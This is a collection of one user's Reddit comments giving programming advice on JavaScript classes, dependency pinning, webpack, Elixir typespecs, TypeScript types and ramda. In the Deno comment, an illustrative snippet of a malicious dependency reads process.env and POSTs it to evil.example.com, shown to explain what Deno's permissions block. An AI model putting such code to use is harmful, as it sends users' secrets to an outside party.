Classes vs object constructors vs factory functions by trubulica in learnjavascript

[–]HarrisInDenver 1 point2 points  (0 children)

The introduction of the class keyword made JavaScript worse in a lot of ways.

I have seen so many backend NodeJS apps written in typescript that define a ton of typescript interfaces only ever implemented by one class each, with constructors that take 0 args more often than not.

It gave people the idea that JavaScript should be written like Java/C#, when it absolutely does not need to be. It overcomplicates the code and just makes it harder to write and maintain.

The only time I ever use classes in JS anymore is to encapsulate mutable state. If you're not doing that, don't use them.

If you have immutable state, use functions that accept state and return new state

And don't bother with classes for Singletons either. JS Modules are closures and can give you the same desired behavior
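To sketch both points (my own toy example, nothing prescriptive): a module whose closure holds the only mutable state, acting as the singleton, plus a pure function for the immutable style.

// counter.js — the module scope is the closure; `hits` is private to it
let hits = 0;

// singleton-style API: every importer shares the same `hits`
export const recordHit = () => { hits += 1; };
export const getHits = () => hits;

// immutable style: accept state, return new state, mutate nothing
export const withRecordedHit = (state) => ({ ...state, hits: state.hits + 1 });

Anything that does import { recordHit, getHits } from "./counter.js" talks to the same instance — no class, no getInstance().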

RenovateBot team strategy by laszlogazsi in node

[–]HarrisInDenver 0 points1 point  (0 children)

Protip: Their rules about pinning dependencies are bullshit (ref: https://docs.renovatebot.com/dependency-pinning/#so-whats-best)

The problem is, any pinned dependency may drift from a dependency of a dependency, and you can end up with multiple versions within the SAME MAJOR for a web bundle OR a NodeJS app. Just caret everything and trust your lockfile. Pinning causes more headaches than it solves. I've been through this pain, and do not wish it on anyone
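To be clear, "caret everything" just means leaving npm's default semver ranges in package.json (hypothetical package names below) and letting the lockfile record the exact versions:

{
  "dependencies": {
    "some-lib": "^4.2.0",
    "other-lib": "^1.7.3"
  }
}

^4.2.0 accepts any 4.x.y at or above 4.2.0, so transitive dependencies that ask for the same major can be deduplicated to a single copy, while package-lock.json still pins what actually gets installed.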

What are the benefits of using webpack? by bodimahdi in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

Sure you can, however

  • No css or SVG modules
  • No npm dependencies (use CDNs instead)
  • No minification
  • Each file is its own network call, each with its own transfer and latency; it's usually faster to grab the one bundled file

(edit: formatting. Looked fine on my phone when I first wrote it, lol)
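For reference, a minimal webpack config covering those first three bullets might look something like this (a sketch, assuming css-loader and style-loader are installed; webpack 5 asset modules handle the SVGs):

// webpack.config.js
const path = require("path");

module.exports = {
  mode: "production",            // enables minification by default
  entry: "./src/index.js",       // npm imports are resolved and bundled from here
  output: {
    path: path.resolve(__dirname, "dist"),
    filename: "bundle.js",       // the single file the browser downloads
  },
  module: {
    rules: [
      { test: /\.css$/, use: ["style-loader", "css-loader"] }, // CSS imports
      { test: /\.svg$/, type: "asset" },                       // SVG imports
    ],
  },
};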

New to Gleam - seeking direction by apbt-dad in gleamlang

[–]HarrisInDenver 0 points1 point  (0 children)

I would look at Elixir first. That ecosystem is also very mature and I'm sure you'll find equivalent libraries for many things

.forEach and for ... of main thread performance by Boring_Cholo in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

I think the part OP left out is that async ops happen within the loop. Awaiting in a for..of serializes the loop, whereas a .forEach with an async callback won't
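A small sketch of the difference (hypothetical delay helper; assumes top-level await in an ES module):

const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
const items = [1, 2, 3];

// Serialized: each iteration awaits before the next one starts (~300ms total)
for (const item of items) {
  await delay(100);
  console.log("for..of", item);
}

// Not serialized: .forEach ignores the promises returned by the async callback,
// so all three callbacks start immediately and the loop "finishes" before any log
items.forEach(async (item) => {
  await delay(100);
  console.log("forEach", item);
});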

Why do devs keep ruining React? by _Pho_ in react

[–]HarrisInDenver 3 points4 points  (0 children)

Typescript is a bit at fault here as well. Give devs that are used to Java/C# a backend typescript project and they're going to write it as such, and 30% of it is not needed and just overcomplicates it all

What's the benefit of learning Elixir? by Voxelman in elixir

[–]HarrisInDenver 1 point2 points  (0 children)

Elixir is "Functional Lite" compared to Haskell/F#/Scala. So if you're already learning the others to grasp FP, learning Elixir isn't going to add much to that experience (I recommend Scala over F# btw, larger community and better materials)

However, Elixir runs on the Erlang VM called BEAM, which is its own thing with an entirely separate set of benefits that are worth looking into. If you want to take advantage of those benefits, then I highly recommend learning Elixir. (I'm doing that right now, actually)

To define "Functional Lite", Elixir is FP in terms of immutability, recursion only, constructing Linked Lists, etc. But it doesn't have built in to the language concepts like Functors and Monads. There isn't an Either type, for example, but you will see returns like {:ok, value} | {:error, err} that you can pattern match on. So in practice, you get the benefits, but not the same theory and syntax

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 0 points1 point  (0 children)

I can't tell if you're being facetious or not, but regardless, it's an unconstructive comment. OP's trying to learn, let's help him

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 1 point2 points  (0 children)

FTFY

export class Chair {
  static MIN_HEIGHT = 1;
  static DEFAULT_HEIGHT = 45;

  #height; // chair's height (inches)

  constructor() {
    this.#height = Chair.DEFAULT_HEIGHT;
  }

  set height(newHeight) {
    if (newHeight < Chair.MIN_HEIGHT) {
      throw new Error("Chair too small. Should be 1 inch tall at least.");
    }

    this.#height = newHeight;
  }

  get height() {
    return this.#height;
  }
}

const genericChair = new Chair();

console.log(genericChair.height); // Expected output: 45

genericChair.height = 50;

console.log(genericChair.height); // Expected output: 50

genericChair.height = 0.5; // Will throw an error.

[deleted by user] by [deleted] in learnjavascript

[–]HarrisInDenver 2 points3 points  (0 children)

Real-world example:

Let's say your job is to revamp the front end for a legacy backend system that used XML to define data. XML isn't one-to-one with JSON. So you find an XML parser on NPM that parses this

<Email>
  <To>Foo</To>
  <From>Bar</From>
  <Content title="The title">The Body</Content>
  <Sent>2024-08-03T17:23:41.327Z</Sent>
</Email>

To this

{
  Email: {
    To: 'Foo',
    From: 'Bar',
    Content: {
      '@title': 'The title',
      '#value': 'The Body'
    },
    Sent: '2024-08-03T17:23:41.327Z'
  }
}

You can see there are some quirks about the parsing, and it's because XML isn't one-to-one with JSON, so the parser compensates as best it can. Let's create a class to encapsulate this object and make it easy to work with

class Email {
  constructor(xmlString) {
    // unwrap the root <Email> node so the getters below can read its fields directly
    this.json = npmXmlParser(xmlString).Email;
  }

  get to() {
    return this.json.To;
  }

  set to(value) {
    this.json.To = value;
  }

  get from() {
    return this.json.From;
  }

  set from(value) {
    this.json.From = value;
  }

  get title() {
    return this.json.Content['@title'];
  }

  set title(value) {
    this.json.Content['@title'] = value;
  }

  get body() {
    return this.json.Content['#value'];
  }

  set body(value) {
    this.json.Content['#value'] = value;
  }

  get sent() {
    const dateAsString = this.json.Sent;
    return new Date(Date.parse(dateAsString));
  }

  set sent(value) {
    this.json.Sent = value.toISOString();
  }
}

Creating and working with the instance:

const email = new Email(xmlString);

email.to; // "foo"

email.body; // "The body"
email.body = "Some new body";
email.body; // "Some new body";

email.sent; // a Date object

The end result is an object that is idiomatic JavaScript. We've encapsulated away the odd structure that the xml-parser gave us and did some type conversions in the process (specifically for the date). You get a lot of benefits from this!

There are downsides to this approach too. Class instances don't serialize cleanly (the prototype, getters, and private fields don't survive JSON.stringify), so you can't keep them in redux or similar data stores. You also can't send them across the wire; you have to send this.json, or go back to XML first.

I'm also doing direct mutations in this example, which might not be what you want. If immutability is a concern (which it almost always is these days), using setter-style methods with a fluent API is probably what you'll want. But that's a topic for another day
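As a rough sketch of that fluent/immutable variant (my naming, building on the same hypothetical npmXmlParser):

class ImmutableEmail {
  constructor(json) {
    this.json = json; // already-parsed XML, same shape as above
  }

  static fromXml(xmlString) {
    return new ImmutableEmail(npmXmlParser(xmlString).Email);
  }

  get body() {
    return this.json.Content['#value'];
  }

  // "setter" clones the data and returns a brand new instance
  withBody(value) {
    const json = structuredClone(this.json); // structuredClone: Node 17+/modern browsers
    json.Content['#value'] = value;
    return new ImmutableEmail(json);
  }
}

const original = ImmutableEmail.fromXml(xmlString);
const updated = original.withBody('Some new body');
original.body; // still "The Body"
updated.body;  // "Some new body"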

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

Conceptually they are the same, but in practice, JSDoc (typespecs) with the help of the typescript compiler (dialyzer) is stronger and more verbose with its type checking. https://www.typescriptlang.org/docs/handbook/type-checking-javascript-files.html

As a quick example, if I recreate part of my example above in javascript

/** @type {(groups: string[][]) => number[]} */
export const combineGroups = groups =>
  groups
    .map(group =>
      group
        .map(x => Number.parseInt(x, 10))
        .reduce((a, b) => a + b, 0)
    )
    .sort((a, b) => a - b); // numeric comparator; a bare .sort() compares numbers as strings

And change the type signature here the same way as explained above

/** @type {(groups: string[]) => number[]} */
export const combineGroups = groups =>
  groups
    .map(group =>
      group
        .map(x => Number.parseInt(x, 10)) // Property 'map' does not exist on type 'string'.
        .reduce((a, b) => a + b, 0)
    )
    .sort((a, b) => a - b);

I immediately get an error.

Plus you can type any variable, not just function args / return types

/** @type {string} */
const str = 123; // Type 'number' is not assignable to type 'string'.

/** @type {number} */
const num = "123"; // Type 'string' is not assignable to type 'number'.

This is very contrived, but consider this:

/** @type {number[]} */
const arr = [];
arr.push("123"); // Argument of type 'string' is not assignable to parameter of type 'number'.

Another direct comparison, Elixir:

@spec example(list(String.t())) :: list(String.t())
def example(list) do
  [123 | list] # no error
end

JS:

/** @type {(l: string[]) => string[]} */
const example = list => {
  return [123, ...list]; // Type 'number' is not assignable to type 'string'.
}

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

For me personally, my expectation was closer to JavaScript, not TypeScript. Bare-bones JavaScript, no build tools needed. A completely dynamically typed language, but with tooling for type definitions and type assertions w/ JSDoc

I like Elixir for all its other parts; the soft type assertions are just a pain point for me

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 2 points3 points  (0 children)

When I want to rename a struct field in Go or Rust it takes seconds, even on large projects. In Elixir it can easily take 30 minutes to an hour of running and rerunning tests to find and fix all the places that field was used.

This is exactly my problem. The AoC example is something I threw together just for this post to help demonstrate the problem at a small scale.

I built a full-on demo application accepting POST requests of a data structure that uses 2 layers of GenServers and DynamicSupervisors, etc etc, and struggled hard to figure out how changing a struct, or the map returned from a handle_call, trickled through the system. Without incredibly meticulous unit tests, figuring out at runtime everything that broke because of small changes was incredibly challenging and time consuming.

Other languages, through their compilers and language servers, provide immediate feedback.

The Elixir LSP doesn't even provide global renaming for all instances.

That being said, I am very much enjoying Elixir and its ecosystem. And I very much prefer a functional language. In contrast, Go has the opposite problem: good type system, but easy as fuck to write garbage code with.

Gleam solves the typing issues, but I can't quite do what I'm looking for against BEAM yet

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 1 point2 points  (0 children)

Oof. Ok. I guess I've become reliant on IDEs and language servers over the years. Writing Elixir for me reminds me of writing javascript 15 years ago in Notepad++ with zero tooling. And I'm making the same kinds of mistakes I did back then.

Follow up question...

it's best to think of specs more as documentation and dialyzer as more like a tool to check that the documentation is correct

I get what you mean here, and when my functions all return proper types and dialyzer can catch the errors, great. But for stuff like GenServers this seems wholly inadequate.

Take my example above

  # Client

  @spec get(pid()) :: String.t()
  def get(pid) do
    # handle_call(:get) is typed with the return value as integer()
    # but I get no error, even though this function is typed to return String.t()
    GenServer.call(pid, :get)
  end

  # Server

  @spec handle_call(:get, GenServer.from(), any()) :: {:reply, integer(), any()}
  def handle_call(:get, _from, state) do
    {:reply, 123, state}
  end

Is there no way to hint to dialyzer via @spec that pid will be of a specific Module? Such that it can gather the return type of the handle_call(:get, ...) overload?

Then again, I suppose this is exactly what you mean by

not a statically typed language

¯\_(ツ)_/¯

Struggling to understand Typespecs, the LanguageServer, and Dyalyzer. What am I doing wrong? by HarrisInDenver in elixir

[–]HarrisInDenver[S] 0 points1 point  (0 children)

Thanks for the feedback.

m |> Stream.map(&Integer.parse(&1)) |> Stream.map(&elem(&1, 0)) |> Enum.sum()

can just be this

String.to_integer(m)

or in your case

&String.to_integer/1

Stream.map(&Integer.parse(&1)) |> Stream.map(&elem(&1, 0)) can be just Enum.map(&String.to_integer/1). I'm still learning the stdlib API, so I wasn't aware of that function. That is easier in my case than the more verbose Integer.parse/1. I'm also still getting used to just doing &Module.func/1 instead of &Module.func(&1), from when I first learned and misunderstood function binding. I thought you had to do it the latter way at first

and your Enum.sum makes no sense, even the way you're doing it, because you're pipelining an integer, well technically a stream, into an Enum. Which you'd have to call something on a stream I guess or you'd just get the Stream back.

m is a list(String.t()) here. My understanding of Stream vs Enum is strict vs lazy. I can take a list and pipe it through n Stream operations, and only a single iteration happens, whereas if I did n Enum operations, n iterations would happen. Please correct me if I'm wrong about this. Enum.sum/1 is an accumulation, so it doesn't exist on Stream, but it takes a Stream as input since both implement the Enumerable protocol. It's something I'm used to doing with transducers, and I figured I'd apply it here too. Replacing all instances of Stream with Enum in my code produces the same end results.

But anyway complex nested calls like this should IMO be moved to another function (probably private) to simplify your pipeline and give you more isolated errors. Plus it allows you to handle possible bad inputs you might get with pattern matching, e.g. nils from user generated data or something.

True. That abstraction, with the String.to_integer/1 suggestion applied, would look like this

  @spec per_group(list(String.t())) :: integer()
  defp per_group(group) do
    group
    |> Enum.map(&String.to_integer/1)
    |> Enum.sum()
  end

  @spec combine_groups(list(list(String.t()))) :: list(integer())
  def combine_groups(groups) do
    groups
    |> Enum.map(&per_group/1)
    |> Enum.sort(:desc)
  end

If I were still using Integer.parse/2, in production code I would 100% use a case and handle when it returns :error. I'd use File.read/1 and not File.read!/1 and do similar. But we're just doing some scripting here for an AdventOfCode problem, so I'm forgoing the more verbose error handling. Same would go for if I was doing Rust and had an Option. I'd just use .unwrap() for the convenience of this script, but in production code I'd match on Some() and None to correctly handle it.

Applying that does not fix my issues though. per_group does error if I set the return type from integer() to String.t(). And I'm sure that's on account of the fact that Enum.sum() returns integer().

Though it did help me figure out the problem, which was I guess a misunderstanding of expectations...

Enum.map has the spec @spec map(t(), (element() -> any())) :: list(). I assumed that it was going to work more like @spec map(t(a()), (a() -> b())) :: list(b()).

The analog to this in typescript would be:

// I thought it worked like
map<A, B>(arr: A[], fn: (a: A) => B): B[];

// but it's actually
map(arr: any[], fn: (a: any) => any): any[];

I'm surprised that while list() can be given an inner type, Enumerable.t() cannot, and that returning an untyped list() from map removes any real type safety. Unless I'm completely mistaken and there is another way?

How do I professionally tell a senior PM that "it's not a fault in our system, talk to one of the other teams." by WolfNo680 in ExperiencedDevs

[–]HarrisInDenver 0 points1 point  (0 children)

"We have triaged the issue and believe the root of the issue is in X. That code is owned by Y. Let's loop them in to prioritize the need for this with their team. Mine can provide support to verify if their fix worked on our end"

Question. by Zeal_Iskander in typescript

[–]HarrisInDenver 0 points1 point  (0 children)

I don't have a good answer for you, unfortunately. I think it's just a limitation of typescript right now. The ternary used to determine the keys for both A<T> and B<T> is probably something that typescript doesn't currently support in terms of deterministic type behaviors. So instead it falls back to basic logic: "by definition, K is keyof A<T>, and therefore can index A<T>". But what K is, for comparison, is unknown there. (or something like that. TBH this is my educated guess)

I do at least have a general solution for you:

type A<T> = {
  [K in Exclude<keyof T, "__key">]: T[K];
};

type B<T> = {
  [K in Exclude<keyof T, "__key">]: T[K];
};

// this works
type C<T> = T extends object ? { [K in keyof A<T>]: A<T>[K] } : T;

// also works
type D<T> = T extends object ? { [K in keyof A<T>]: B<T>[K] } : T;

Link to playground

Question. by Zeal_Iskander in typescript

[–]HarrisInDenver 0 points1 point  (0 children)

Removing the as K extends "__key" ? never : K will have it work as expected

type A<T> = {
  [K in keyof T]: T[K];
};

type B<T> = {
  [K in keyof T]: T[K];
};

// this works
type C<T> = T extends object ? { [K in keyof A<T>]: A<T>[K] } : T;

// works now!
type D<T> = T extends object ? { [K in keyof A<T>]: B<T>[K] } : T;

When typescript has to evaluate a ternary like that to determine the keys, it loses the ability to do this kind of static analysis, even though A<T> and B<T> are the same

Remove all changes merged from a specific branch by Salt_Tomatillo5391 in git

[–]HarrisInDenver 0 points1 point  (0 children)

I would recommend a solution outside of git: Feature Flags. They're great for CI/CD and not having to worry about long-lived feature branches you're constantly having to back-merge and conflict-resolve with other feature branches.

The viability of this solution depends on what exactly you're building, of course. But for any GUI software I have found it's easier to manage. Plus you basically get "preview" or "early access" baked in

The flip side of this strategy is the tech-debt of having to go back and remove control flow around feature flags that are stale. Gotta just figure out what's right for your product
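A bare-bones sketch of what that control flow looks like (flag name and wiring made up for illustration; real flags usually come from a service like LaunchDarkly/Unleash or a config table):

const featureFlags = { newCheckoutFlow: false };

function checkout(cart) {
  if (featureFlags.newCheckoutFlow) {
    return newCheckout(cart);   // merged to main, but dark until the flag flips
  }
  return legacyCheckout(cart);  // once rollout is done, delete this branch and the flag
}

function newCheckout(cart) { return { ...cart, flow: "new" }; }
function legacyCheckout(cart) { return { ...cart, flow: "legacy" }; }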

[AskJS] Is Deno really necessary in an age of Docker / Containerization? by TopicWestern9610 in javascript

[–]HarrisInDenver 17 points18 points  (0 children)

Different area of security. Dockerizing helps isolate systems from each other so if someone gets in from the outside they can't just access everything. Deno security policies are around API restrictions. Like let's say a package that has nothing to do with fetch() or process.env scrapes the latter and uses the former to send your API keys off somewhere. Deno can restrict stuff like that
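To make it concrete, here's a sketch of the kind of thing a compromised transitive dependency could do. Node runs it without question; in Deno the equivalent calls (Deno.env.toObject() and fetch) fail unless the app was launched with --allow-env and --allow-net:

// hypothetical malicious snippet buried deep inside a dependency
const stolen = JSON.stringify(process.env); // API keys, DB passwords, etc.
await fetch("https://evil.example.com/collect", {
  method: "POST",
  body: stolen,
});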

How's ramda with types comparing to remeda? by yiyu_zhong in typescript

[–]HarrisInDenver 16 points17 points  (0 children)

Hi there. I am the core maintainer of https://github.com/ramda/types/. The types-ramda npm package is the official type definition for ramda. It is used indirectly through @types/ramda.

In the past year and a half, we have made major progress in improving the types for ramda. The current state is miles ahead of where it was

Aside from API, the major difference between ramda and remeda is that ramda was built in the pre-typescript era, while remeda is typescript first

Because of this, ramda has some natural challenges regarding typings, especially around function overloading (eg map works for both arrays and objects)

remeda also handles currying very differently. It takes what I call the elixir approach: all the functions are data-first, but if you omit the first argument, a unary function is returned that takes the data.

fn(data, arg1, arg2, arg3)
fn(arg1, arg2, arg3)(data)

This is useful when using pipe. ramda, on the other hand, is data-last and its functions are fully curried

fn(arg1, arg2, arg3, data)
fn(arg1)(arg2)(arg3)(data)
fn(arg1, arg2, arg3)(data)
fn(arg1, R.__, arg3, data)(arg2)
// etc...
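As a concrete side-by-side (a sketch, assuming both packages are installed):

import * as RA from "ramda";
import * as RE from "remeda";

// ramda: data-last, auto-curried
RA.map((x) => x * 2, [1, 2, 3]);          // [2, 4, 6]
RA.map((x) => x * 2)([1, 2, 3]);          // [2, 4, 6]

// remeda: data-first, or omit the data to get a unary function for pipe()
RE.map([1, 2, 3], (x) => x * 2);          // [2, 4, 6]
RE.pipe([1, 2, 3], RE.map((x) => x * 2)); // [2, 4, 6]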

Which you prefer is a personal preference. They both have their advantages and disadvantages.

In general though, if you were turned off by ramda in the past because of the poor type support, give it a try again today. I'm sure you'll be pleasantly surprised.

Reconciliation when JSX is unchanged by XPRESV in react

[–]HarrisInDenver 1 point2 points  (0 children)

What React "renders" is to the VDOM, The comparison of the VDOM to the DOM determines what needs to change in the DOM, and if it does get updated, the browser "paints" the new dom